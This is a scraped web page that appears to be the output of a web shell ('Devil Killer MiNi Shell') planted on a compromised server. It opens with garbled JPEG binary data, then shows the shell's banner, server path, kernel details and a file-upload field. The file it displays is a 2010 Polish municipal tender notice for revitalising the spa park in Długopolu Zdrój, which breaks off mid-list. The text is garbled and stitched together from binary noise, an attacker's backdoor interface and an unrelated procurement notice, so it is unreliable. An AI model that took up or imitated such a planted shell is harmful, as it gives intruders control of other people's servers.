JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100223/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100223/36465-N-2010.html

<p class="kh_header"><b>Bystrzyca Kłodzka: Rewitalizacja Parku Zdrojowego w Długopolu Zdroju</b><br>
<b>Numer ogłoszenia: 36465 - 2010; data zamieszczenia: 23.02.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Bystrzyca Kłodzka , ul. Henryka Sienkiewicza 6, 57-500 Bystrzyca Kłodzka, woj. dolnośląskie, tel. 074 8117600, faks 074 8111588.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bystrzycaklodzka.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Rewitalizacja Parku Zdrojowego w Długopolu Zdroju.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamówienie obejmuje wykonanie niżej wymienionych robót w Parku Zdrojowym w Długopolu 
       Zdroju, prowadzących do utrzymania dotychczasowej funkcji parkowej obiektu. Zmianie ulega 
       funkcja sportowa, związana z istniejącymi boiskami przeznaczonymi do likwidacji.
       Zakres robót objętych przedmiotowym zamówieniem:
a)	Rozbiórki ogrodzenia, murów oporowych, nawierzchni utwardzonych, niecki stawu.
b)	Zmiany nawierzchni i korekty przebiegu układu komunikacyjnego - ścieżek, alei, placów 
      i miejsc widokowych oraz  wytyczenie nowych ścieżek komunikacyjnych 
c)	Kształtowanie terenu (wycinka drzew, nasadzenia krzewów roślin ozdobnych).
d)	Budowa nowych elementów małej architektury, tj.:
- ogrodzenia od ulicy Zdrojowej;
- bocznego wejścia od ulicy Zdrojowej;
- budowy schodów kamiennych;
- budowy schodów na ścieżkach miękkich;
- budowy pomostu drewnianego (z pergolą);
- budowy ogrodzenia od działek mieszkalnych (ogrodzenie drewniane);
- budowy fontanny wraz z siedziskami przy schodach kamiennych. 
e)	Przebudowa istniejących elementów małej architektury:
- przebudowa groty ze źródłem;
- przebudowa trybun amfiteatru;
- przebudowa stawu z altanką.
f)	Instalacje sanitarne:
- budowa przyłącza wodociągowego;
- budowa kanalizacji deszczowej.
g)	Instalacje elektryczne:
- lampy i latarnie oświetleniowe;
- linie kablowe i linie oświetleniowe;
Uwaga: Inwestor usunął kolizję linii napowietrznej nn X-3 i X-4 w 2009 r.
Zakres w/w/ robót objętych przedmiotem zamówienia dotyczy tylko robót zaprojektowanych na działkach należących do Gminy Bystrzyca Kłodzka, tj. na działkach Nr 103, 107, 109, 113/4, 113/5 obręb Długopole Zdrój.
Szczegółowy opis przedmiotu zamówienia zawiera Część III Specyfikacji istotnych Warunków 
       Zamówienia, zwanej w dalszej części zamówienia SIWZ, a w nim:
       a) Projekt zagospodarowania terenu - Tom: 1 Rozdział: 1
       b) Projekt zagospodarowania terenu - Instalacje sanitarne - Tom: 1 Rozdział: 2
       c) Projekt zagospodarowania terenu - Instalacje elektryczne - Tom: 1 Rozdział: 3
       d) Projekt obiektów małej architektury na działkach nr 103, 107, 109, 113/4, 113/5 -
           Tom: 4 Rozdział: 1
       e) Projekt obiektów małej architektury na działkach nr 103, 107, 109, 113/4, 113/5 - Instalacje  
           sanitarne - Tom: 4 Rozdział: 2;
       f) Projekt obiektów małej architektury na działkach nr 103, 107, 109, 113/4, 113/5 - Instalacje 
           elektryczne - Tom: 4 Rozdział: 3.
       g) Specyfikacja techniczna  wykonania i odbioru robót - ogólna i branży budowlanej;
       h) Specyfikacja techniczna wykonania i odbioru robót - branża sanitarna;
        i) Specyfikacja techniczna wykonania i odbioru robót - branża elektryczna;
        j) Przedmiar robót - roboty budowlane;
       k) Przedmiar robót - instalacje elektryczne;
        l) Przedmiar robót - instalacje sanitarne..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.11.27.10-5, 45.10.00.00-8, 45.11.12.91-4, 45.11.13.00-1, 45.11.12.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 10.11.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Zamawiający żąda od Wykonawcy wniesienia wadium w wysokości 83 000,00 PLN.

2. Wadium może być wnoszone w jednej lub kilku następujących formach:
            - pieniądzu
- poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-
kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
- gwarancjach bankowych
- gwarancjach ubezpieczeniowych
- poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy 
z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości 
(Dz. U. Nr 109, poz. 1158 z późn. zm.).

3. Wadium wnoszone w pieniądzach wpłaca się przelewem na rachunek bankowy wskazany 
przez Zamawiającego, tj: 
Powiatowy Bank Spółdzielczy w Strzelinie Oddział w Bystrzycy Kłodzkiej
Osiedle Szkolne 10B/17, 57-500 Bystrzyca Kłodzka,
nr rachunku: 07 9588 0004 9700 0299 2000 0090.

4. W przypadku wadium wnoszonego w pieniądzu, jako termin wniesienia wadium przyjęty 
zostaje termin uznania kwoty na rachunku bankowym Zamawiającego, przy czym kwota 
wadium winna znaleźć się na rachunku bankowym przed terminem składania ofert. 

5. W przypadku wniesienia wadium w formie innej niż pieniądz - oryginał dokumentu 
potwierdzającego wniesienie wadium należy złożyć przed upływem terminu składania ofert 
w siedzibie Zamawiającego - Gminy Bystrzyca Kłodzka, tj. w Urzędzie Miasta i Gminy                        w Bystrzycy Kłodzkiej, ul. Sienkiewicza 6, 57-500 Bystrzyca Kłodzka, w pok. 22, lub dołączyć do oferty.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełnienia tego warunku Wykonawca musi załączyć do oferty:
- aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
     Ocena spełniania warunku dokonana zostanie zgodnie z formułą: spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach.
Nie załączenie w/w dokumentu, w przypadku jeżeli odrębne przepisy wymagają  wpisu do rejestru, będzie skutkowało odrzuceniem oferty lub wykluczeniem wykonawcy z postępowania i jednoczesnym odrzuceniem oferty, z zastrzeżeniem art. 26 ust. 3 P.z.p. 
Jeżeli wybrany Wykonawca lub jego Podwykonawca będzie osobą fizyczną, to przed podpisaniem umowy o wykonanie przedmiotu zamówienia, Zamawiający zażąda od niego przedłożenia kserokopii, potwierdzonej za zgodność z oryginałem, zaświadczenia o wpisie do ewidencji działalności gospodarczej, aktualnego na dzień składania ofert.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełnienia tego warunku Wykonawca musi wykazać, ze wykonał w okresie ostatnich 5 lat, przed dniem wszczęcia niniejszego postępowania, a jeżeli okres prowadzenia działalności Wykonawcy jest krótszy - w tym okresie - roboty budowlane odpowiadające swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot niniejszego zamówienia, tj. zrealizował roboty budowlane polegające na wykonaniu łącznie:
- przynajmniej jednej roboty budowlanej polegającej na wykonaniu dróg, chodników z kostki 
  betonowej lub kamiennej, o wartości min. 700 000 zł. brutto,
- przynajmniej jednego oświetlenia drogowego lub parkowego, o wartości min. 130 000 zł. brutto,
- przynajmniej jednej roboty polegającej na kształtowaniu terenów zielonych (wycinka, pielęgnacja   
   i nasadzenia drzew i krzewów, zakładanie trawników), o wartości min. 70 000 zł. brutto;
- przynajmniej jednej roboty polegającej na wykonaniu sieci wod.-kan., o wartości robót min. 
  100 000 zł. brutto.
W celu potwierdzenia spenienia tego warunku Wykonawca musi załączyć do pferty:Wykaz min. 4 (czterech) wykonanych robót budowlanych, z podaniem ich rodzaju i wartości, zakresu robót oraz daty i miejsca wykonania, sporządzony według wzoru określonego w Załączniku Nr 5 do SIWZ.
       Wykonawca załącza do tego wykazu dokumenty potwierdzające, ze wykazane roboty   budowlane zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone (np. referencje, protokoły odbioru robót bez usterek i wad), tj.
       -  min. 1 szt. referencji lub 1 szt. protokołu odbioru bez usterek i wad dla przynajmniej jednej
          roboty budowlanej polegającej na wykonaniu dróg, chodników z kostki betonowej lub 
          kamiennej, o wartości min. 700 000 zł. brutto;
       -  min. 1 szt. referencji lub 1 szt. protokołu odbioru bez usterek i wad dla przynajmniej jednego 
          oświetlenia drogowego lub parkowego, o wartości min. 130 000 zł. brutto;
       -  min. 1 szt. referencji lub 1 szt. protokołu odbioru bez usterek i wad dla przynajmniej jednej 
           roboty polegającej na kształtowaniu terenów zielonych (wycinka, pielęgnacja i nasadzenia 
           drzew i krzewów, zakładanie trawników), o wartości min. 70 000 zł. brutto;
       -  min. 1 szt. referencji lub 1 szt. protokołu odbioru bez usterek i wad dla przynajmniej jednej   
           roboty polegającej na wykonaniu sieci wod. - kan., o wartości robót min. 100 000 zł. brutto.
Ocena spełniania warunku dokonana zostanie zgodnie z formułą: spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach.
Nie załączenie w/w dokumentów będzie skutkowało odrzuceniem oferty lub wykluczeniem Wykonawcy z postępowania i jednoczesnym odrzuceniem oferty, z zastrzeżeniem art. 26 ust. 3 P.z.p.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia Wykonawcom warunków udziału w postępowaniu w zakresie potencjału technicznego.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełnienia tego warunku Wykonawca musi wykazać, że dysponuje następujacymi osobami lub/i podmiotami pozostajacymi do dyspozycji Wykonawcy:
osobą Kierownika budowy, posiadającego aktualne uprawnienia do pełnienia samodzielnych 
   funkcji technicznych w budownictwie w branży ogólnobudowlanej w specjalności konstrukcyjno 
   - budowlanej bez ograniczeń.
   Ponadto zgodnie z Decyzją nr 104/09 z 26.02.2009 r. wydaną przez Dolnośląskiego 
   Wojewódzkiego Konserwatora Zabytków we Wrocławiu Delegatura w Wałbrzychu -- Kierownik 
   budowy, w całym swoim okresie zawodowym, musi wykazać się co najmniej 2-letnią praktyką na 
   budowie przy zabytkach nieruchomych;
- osobą Kierownika robót, posiadającego aktualne uprawnienia do pełnienia samodzielnych funkcji 
   technicznych w budownictwie, w branży instalacyjnej, w zakresie sieci, instalacji i urządzeń 
   elektrycznych i elektroenergetycznych;
- osobą Kierownika robót, posiadającego aktualne uprawnienia do pełnienia samodzielnych funkcji 
   technicznych w budownictwie, w branży instalacyjnej, w zakresie sieci, instalacji i urządzeń 
   wodociągowych i kanalizacyjnych; 
- osobą Kierownika robót, posiadającego aktualne uprawnienia do pełnienia samodzielnych funkcji 
   technicznych w budownictwie w branży drogowej, bez ograniczeń lub w zakresie ograniczonym;
- osobą Kierownika odpowiedzialnego za kierowanie robotami związanymi z kształtowaniem 
   terenów zielonych; 
   Ponadto zgodnie z Decyzją nr 104/09 z 26.02.2009 r. wydaną przez Dolnośląskiego 
   Wojewódzkiego Konserwatora Zabytków we Wrocławiu Delegatura w Wałbrzychu -- osoba ta 
   musi posiadać tytuł zawodowy magistra uzyskany po ukończeniu wyższych studiów, 
   obejmujących wiadomości w zakresie kształtowania zieleni oraz musi wykazać, że odbyła po 
   ukończeniu studiów 12- miesięczną praktyką zawodową przy konserwacji i pielęgnacji zabytków 
   zieleni;
- osobami posiadającymi min. 12-miesięczna praktykę zawodową przy pielęgnacji zabytków zieleni
   lub osobami posiadającymi średnie wykształcenie z zakresu pielęgnacji zieleni; Zamawiający 
   wymaga, aby Wykonawca dysponował co najmniej 3 osobami do zakresu robót, związanego  
   z kształtowaniem zieleni;

Powyższe wymagania dotyczące kadry Wykonawcy, tj. wymagania dotyczące Kierownika budowy, Kierownika odpowiedzialnego za kierowanie robotami związanymi z kształtowaniem terenów zielonych a także osób wykonujących prace w zakresie kształtowania terenów zielonych zostały podyktowane Zamawiającemu przez Dolnośląskiego Wojewódzkiego Konserwatora Zabytków we Wrocławiu Delegatura w Wałbrzychu, ul. Zamkowa 3, 58-300 Wałbrzych, na mocy Decyzji nr 104/09 z dnia 26.02.2009 r. Park Zdrojowy w Długopolu Zdroju wpisany jest do rejestru zabytków pod numerem 672/W decyzją z dnia 04.10.1977 r.
Zamawiający załącza do SIWZ kserokopię Decyzji nr 104/09 z dnia 26.02.2009 r. wydanej przez Dolnośląskiego Wojewódzkiego Konserwatora Zabytków we Wrocławiu Delegatura w Wałbrzychu, ul. Zamkowa 3, 58-300 Wałbrzych.
W celu potwierdzenia tego warunku Wykonawca musi załaczyć do oferty wykaz osób i podmiotów, które będą uczestniczyć w wykonywaniu zamówienia, wraz                     z informacjami na temat ich kwalifikacji zawodowych, wykształcenia i doświadczenia zawodowego niezbędnego do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności, sporządzony według wzoru określonego w Załączniku Nr 6, Załączniku             Nr 7, Załączniku Nr 8, Załączniku Nr 9,  Załączniku Nr 10, Załączniku Nr 10A, Załączniku Nr 11 do SIWZ. 
W szczególności Wykonawca musi załączyć do oferty:
Oświadczenia, że osoby, które będą uczestniczyć w realizacji zamówienia posiadają wymagane uprawnienia, w szczególności:
a) posiadanie przez Kierownika budowy uprawnień do pełnienia samodzielnych funkcji 
  technicznych w budownictwie w branży ogólnobudowlanej w specjalności konstrukcyjno - 
  budowlanej bez ograniczeń, przynależność tej osoby do właściwej izby samorządu zawodowego 
  oraz posiadanie ubezpieczenia o.c. tej osoby, jeżeli nie wynika ono z zaświadczenia 
  o przynależności do izby samorządu zawodowego;
  Powyższe oświadczenie stanowi Załącznik Nr 6 do SIWZ.
  Ponadto, zgodnie z wytycznymi Dolnośląskiego Konserwatora Zabytków we Wrocławiu,
  Kierownik budowy musi wykazać się co najmniej 2 - letnią praktyką na budowie przy zabytkach 
    nieruchomych. Okresy odbytych praktyk nie mogą nakładać się w czasie(każdy miesiąc 
    liczony jest tylko raz). Powyższe oświadczenie stanowi Załącznik Nr 7 do SIWZ, do którego 
    należy dołączyć min. 1 szt. referencji lub min. 1 szt. protokołu odbioru robót bez usterek i wad, 
    którymi kierował wymieniony Kierownik budowy.
 b) posiadanie przez Kierownika robót elektrycznych uprawnień do pełnienia samodzielnych 
    funkcji technicznych w budownictwie w branży elektrycznej, przynależność tej osoby do 
    właściwej izby samorządu zawodowego oraz posiadanie ubezpieczenia o.c. tej osoby, jeżeli nie 
    wynika ono z zaświadczenia o przynależności do izby samorządu zawodowego;
    Powyższe oświadczenie stanowi Załącznik Nr 6 do SIWZ
 c) posiadanie przez Kierownika robót sanitarnych uprawnień do pełnienia samodzielnych 
    funkcji technicznych w budownictwie w branży sanitarnej, przynależność tej osoby do 
    właściwej izby samorządu zawodowego oraz posiadanie ubezpieczenia o.c. tej osoby, jeżeli nie 
    wynika ono z zaświadczenia o przynależności do izby samorządu zawodowego;
    Powyższe oświadczenie stanowi Załącznik Nr 6 do SIWZ
 d) posiadanie przez Kierownika robót drogowych uprawnień do pełnienia samodzielnych funkcji 
    technicznych w budownictwie w branży drogowej, przynależność tej osoby do właściwej izby       
    samorządu zawodowego oraz posiadanie ubezpieczenia o.c. tej osoby, jeżeli nie wynika ono 
    z zaświadczenia o przynależności do izby samorządu zawodowego;
    Powyższe oświadczenie stanowi Załącznik Nr 6 do SIWZ
 e) posiadanie przez Kierownika robót związanych z kształtowaniem terenów zielonych:
    - dyplomu magistra, uzyskanego po ukończeniu wyższych studiów obejmujących wiadomości 
       w zakresie kształtowania zieleni;
       Powyższe oświadczenie stanowi Załącznik Nr 6 do SIWZ      
     - oraz posiadanie przez wymienionego Kierownika co najmniej 12-miesięcznej 
       praktyki zawodowej przy konserwacji i pielęgnacji zabytków zieleni, odbytej po ukończeniu 
       tych studiów; Okresy odbytych praktyk nie mogą nakładać się w czasie (każdy miesiąc 
       liczony jest tylko raz). Powyższe oświadczenie stanowi Załącznik Nr 8 do SIWZ, do którego 
       należy dołączyć min. 1 szt. referencji lub min. 1 szt. protokołu odbioru robót bez usterek i wad, 
       w których brał udział wymieniony Kierownik robót związanych z kształtowaniem terenów 
       zielonych.
f)	posiadanie przez osoby (min. 3), które zajmować się będą robotami w zakresie kształtowania 
     terenów zielonych wykształcenia min. średniego w zakresie kształtowania terenów zielonych lub 
     posiadanie przez te osoby min. 12 - miesięcznej praktyki zawodowej przy pielęgnacji    
     zabytków zieleni.
     Powyższe oświadczenie stanowi Załącznik Nr 9 do SIWZ.
     Osoby zatrudnione przy kształtowaniu zieleni muszą spełniać jeden z warunków: posiadać min.
     średnie wykształcenie w w/w zakresie lub posiadać 12 - miesięczna praktykę zawodową przy 
     pielęgnacji zabytków zieleni.
     W przypadku wykazania min. 3 osób, posiadających 12 - miesięczna praktykę w w/w zakresie, 
     do dokumentu należy dołączyć min. po 1 szt. referencji, dla każdej z wymienionych osób.
     W przypadku zatrudnienia do wykonania tych robót firmy (Wykonawcy - Konsorcjum, 
     Podwykonawcy) do dokumentu należy dołączyć min. 1 szt. referencji lub innych dokumentów
     (protokoły odbioru robót), potwierdzających miejsce i czas wykonywania wyszczególnionych 
     robót oraz wykonanie ich z należytą starannością. Referencje lub protokoły odbioru musza być 
     wystawione dla wymienionej firmy.
Ocena spełniania warunku dokonana zostanie zgodnie z formułą: spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach.
Nie załączenie w/w dokumentów będzie skutkowało odrzuceniem oferty lub wykluczeniem wykonawcy z postępowania i jednoczesnym odrzuceniem oferty, z zastrzeżeniem art. 26 ust. 3 P.z.p. 
Przed podpisaniem umowy o wykonanie przedmiotu zamówienia Zamawiający zażąda od wybranego Wykonawcy przedłożenia oryginału lub kserokopii w/w uprawnień Kierownika budowy, Kierowników robót oraz dyplomu Kierownika robót związanych z kształtowaniem terenów zielonych a także dokumentów potwierdzających posiadanie wykształcenia min. średniego przez osoby wyszczególnione w ofercie do robót związanych z kształtowanie zieleni (jeżeli Wykonawca wypełnił Załącznik Nr 9 do SIWZ - pkt 1). Kserokopie tych dokumentów muszą być poświadczone za zgodność z oryginałem przez Wykonawcę lub przez podmioty, których dotyczą te dokumenty (w przypadku gdy dokumenty dotyczą podmiotów, z zasobów których korzystać będzie Wykonawca w trakcie realizacji zamówienia, na podstawie art. 26 ust 2b P.z.p.).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia Wykonawcom warunków udziału w postępowaniu w zakresie sytuacji ekonomicznej i finansowej. Dopiero od wybranego Wykonawcy Zamawiający zażąda przedłożenia najpóźniej w dniu podpisania umowy opłaconych polis ubezpieczeniowych:
1. Ubezpieczenie w pełnym zakresie od odpowiedzialności cywilnej kontraktowej w związku 
    z realizacją niniejszej umowy oraz ubezpieczenie od zniszczenia wszelkiej własności (plac 
    budowy oraz mienie osób trzecich), spowodowanego działaniem siły wyższej lub działaniem 
    osób trzecich (akty wandalizmu, kradzież),  w wysokości: 1 000 000 PLN.
2. Ubezpieczenie w pełnym zakresie od odpowiedzialności cywilnej deliktowej z tytułu 
    prowadzonej działalności wobec powierzonego mienia i osób trzecich, od zniszczenia wszelkiej 
    własności, spowodowanego działaniem, zaniechaniem lub niedopatrzeniem Wykonawcy, z polisą 
    na sumę ubezpieczeniową w wysokości: co najmniej 500 000 PLN.
Obie polisy ubezpieczeniowe muszą obowiązywać co najmniej na okres: od dnia zawarcia umowy do dnia odbioru końcowego przedmiotu zamówienia, bez usterek i wad. Jeżeli termin zakończenia realizacji robót ulegnie zmianie Wykonawca będzie zobowiązany przedłożyć aneks terminowy do wyżej opisanych ubezpieczeń.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

